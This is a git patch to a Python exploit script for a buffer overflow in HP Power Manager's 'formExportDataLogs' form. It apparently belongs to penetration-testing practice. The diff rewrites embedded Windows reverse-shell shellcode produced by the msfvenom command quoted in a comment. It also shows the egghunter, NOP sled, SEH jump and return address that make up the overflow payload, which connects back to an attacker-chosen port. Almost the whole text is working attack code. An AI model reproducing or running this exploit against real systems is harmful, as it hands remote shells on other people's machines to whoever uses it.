From c805eedd524068168e7c4c797478641b3e3238cb Mon Sep 17 00:00:00 2001 From: 0xG0ez <0xG0ez@> Date: Sat, 8 Mar 2025 14:24:58 +0100 Subject: [PATCH] Fix broken bad characters Use c-style variable --- hp_pm_exploit_p3.py | 68 ++++++++++++++++++++++----------------------- 1 file changed, 34 insertions(+), 34 deletions(-) diff --git a/hp_pm_exploit_p3.py b/hp_pm_exploit_p3.py index 0d6ed51..d2bad90 100644 --- a/hp_pm_exploit_p3.py +++ b/hp_pm_exploit_p3.py @@ -1,7 +1,7 @@ -#!/usr/bin/python +#!/usr/bin/python3 # This is a python3 port / extension of the HP Power Manager 'formExportDataLogs' Buffer Overflow Script by Muhammad Haidari # For the original script visit: https://github.com/Muhammd/HP-Power-Manager -# +# # Usage: python3 hp_pm_exploit_p3.py # : ip address the HP Power Manager is running on # : port the application is running on @@ -23,41 +23,41 @@ LPORT = int(argv[3]) # port the shellcode is connecting back to -> listener gets sta if (len(argv)>4): raise IndexError -except IndexError: +except IndexError: print("Usage: python3 %s " % argv[0]) print("Example: python3 %s 10.10.0.1 80 4411" % argv[0]) exit() -#msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4411 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python -egg = "b33fb33f" -buf = egg -buf += "\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81" -buf += "\x1f\x0e\xd2\x8c\x95\x88\x83\xee\xfc\xe2\xf4\x2e\x64" -buf += "\x17\x8f\xd2\x8c\xf5\x01\x37\xbd\x25\xec\x59\xdc\xa5" -buf += "\x13\x30\x80\x1e\xda\xc6\x07\xe7\xa0\xdd\x3b\xdf\xae" -buf += "\xe3\x73\x39\xb4\xb3\xf0\x97\xa4\xf2\x4d\x5a\x85\xd3" -buf += "\x3b\x77\x7a\x80\xdb\x1e\xda\xa2\x07\xdf\xb4\x59\xc0" -buf += "\x84\xf0\x31\xc4\x94\x59\x83\x07\xcc\xa8\xd3\x5f\x1e" -buf += "\xcc\xca\x6f\xaf\xc1\x59\xb8\x1e\x89\x04\xbd\x6a\x24" -buf += "\x13\x43\x98\x89\x15\x34\x75\xfd\x24\x8f\xf8\x70\xe9" -buf += "\xf1\xb1\xfd\x36\xd4\x1e\xd0\xf6\x8d\x46\xee\x59\x80" -buf += "\xde\x03\x8a\x90\x94\x5b\x59\x88\x1e\x89\x02\x05\xd1" -buf += "\x2c\xf6\xd7\xce\xe9\x8b\xd6\xc4\x77\x32\xd3\xca\xd2" -buf += "\x59\x9e\x7e\x05\x8f\xe4\xa6\xba\xd2\x8c\xfd\xff\xa1" -buf += "\x2e\xca\xdc\xba\xc0\xe2\xae\xd5\x73\x40\x30\x42\x8d" -buf += "\x35\x88\xfb\x48\xc1\xd8\xba\xa5\x15\xe3\xd2\x73\x40" -buf += "\xd8\x82\xdc\xc5\xc8\x82\xcc\xc5\xe0\x38\x83\x4a\x68" -buf += "\x2d\x59\x02\xe2\xd7\xe4\x9f\x83\xd2\x19\xfd\x8a\xd2" -buf += "\xed\xae\x01\x34\xe6\x85\xde\x85\xe4\x0c\x2d\xa6\xed" -buf += "\x6a\x5d\x57\x4c\xe1\x24\x2d\xc2\x9d\xfd\x3e\xe4\x65" -buf += "\x3d\x70\xda\x6a\x5d\xba\xef\xf8\xec\xd2\x05\x76\xdf" -buf += "\x85\xdb\xa4\x7e\xb8\x9e\xcc\xde\x30\x71\xf3\x4f\x96" -buf += "\xa8\xa9\x89\xd3\x01\xd1\xac\xc2\x4a\x95\xcc\x86\xdc" -buf += "\xc3\xde\x84\xca\xc3\xc6\x84\xda\xc6\xde\xba\xf5\x59" -buf += "\xb7\x54\x73\x30\x01\x32\xc2\xc3\xce\x2d\xbc\xfd\x80" -buf += "\x25\x91\xff\x77\x07\x37\x75\x95\xf8\x86\xfd\x2e\x47" -buf += "\x31\x28\x77\x07\xb0\x93\xf4\xd8\x0c\x6e\x68\xa7\x89" -buf += "\x2e\xff\xc1\xfe\xfa\xf2\xd2\xdf\x6a\x5d" +#msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4411 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24' x86/alpha_mixed --platform windows -f c +# add reverse shell after 'b33fb33f' +buf = ("b33fb33f" +"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81" +"\x1f\x0e\xd2\x8c\x95\x88\x83\xee\xfc\xe2\xf4\x2e\x64" +"\x17\x8f\xd2\x8c\xf5\x01\x37\xbd\x25\xec\x59\xdc\xa5" +"\x13\x30\x80\x1e\xda\xc6\x07\xe7\xa0\xdd\x3b\xdf\xae" +"\xe3\x73\x39\xb4\xb3\xf0\x97\xa4\xf2\x4d\x5a\x85\xd3" +"\x3b\x77\x7a\x80\xdb\x1e\xda\xa2\x07\xdf\xb4\x59\xc0" +"\x84\xf0\x31\xc4\x94\x59\x83\x07\xcc\xa8\xd3\x5f\x1e" +"\xcc\xca\x6f\xaf\xc1\x59\xb8\x1e\x89\x04\xbd\x6a\x24" +"\x13\x43\x98\x89\x15\x34\x75\xfd\x24\x8f\xf8\x70\xe9" +"\xf1\xb1\xfd\x36\xd4\x1e\xd0\xf6\x8d\x46\xee\x59\x80" +"\xde\x03\x8a\x90\x94\x5b\x59\x88\x1e\x89\x02\x05\xd1" +"\x2c\xf6\xd7\xce\xe9\x8b\xd6\xc4\x77\x32\xd3\xca\xd2" +"\x59\x9e\x7e\x05\x8f\xe4\xa6\xba\xd2\x8c\xfd\xff\xa1" +"\x2e\xca\xdc\xba\xc0\xe2\xae\xd5\x73\x40\x30\x42\x8d" +"\x35\x88\xfb\x48\xc1\xd8\xba\xa5\x15\xe3\xd2\x73\x40" +"\xd8\x82\xdc\xc5\xc8\x82\xcc\xc5\xe0\x38\x83\x4a\x68" +"\x2d\x59\x02\xe2\xd7\xe4\x9f\x83\xd2\x19\xfd\x8a\xd2" +"\xed\xae\x01\x34\xe6\x85\xde\x85\xe4\x0c\x2d\xa6\xed" +"\x6a\x5d\x57\x4c\xe1\x24\x2d\xc2\x9d\xfd\x3e\xe4\x65" +"\x3d\x70\xda\x6a\x5d\xba\xef\xf8\xec\xd2\x05\x76\xdf" +"\x85\xdb\xa4\x7e\xb8\x9e\xcc\xde\x30\x71\xf3\x4f\x96" +"\xa8\xa9\x89\xd3\x01\xd1\xac\xc2\x4a\x95\xcc\x86\xdc" +"\xc3\xde\x84\xca\xc3\xc6\x84\xda\xc6\xde\xba\xf5\x59" +"\xb7\x54\x73\x30\x01\x32\xc2\xc3\xce\x2d\xbc\xfd\x80" +"\x25\x91\xff\x77\x07\x37\x75\x95\xf8\x86\xfd\x2e\x47" +"\x31\x28\x77\x07\xb0\x93\xf4\xd8\x0c\x6e\x68\xa7\x89" +"\x2e\xff\xc1\xfe\xfa\xf2\xd2\xdf\x6a\x5d") #egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a' -e b33f -v 'hunter' hunter = b"" @@ -67,7 +67,7 @@ buffer = b"\x41" * (721 -len(hunter)) buffer += b"\x90"*30 + hunter -buffer += b"\xeb\xc2\x90\x90" #JMP SHORT 0xC2 +buffer += b"\xeb\xc2\x90\x90" #JMP SHORT 0xC2 buffer += b"\xd5\x74\x41" #pop esi # pop ebx # ret 10 (DevManBE.exe) content= "dataFormat=comma&exportto=file&fileName=%s" % parse.quote_plus(buffer)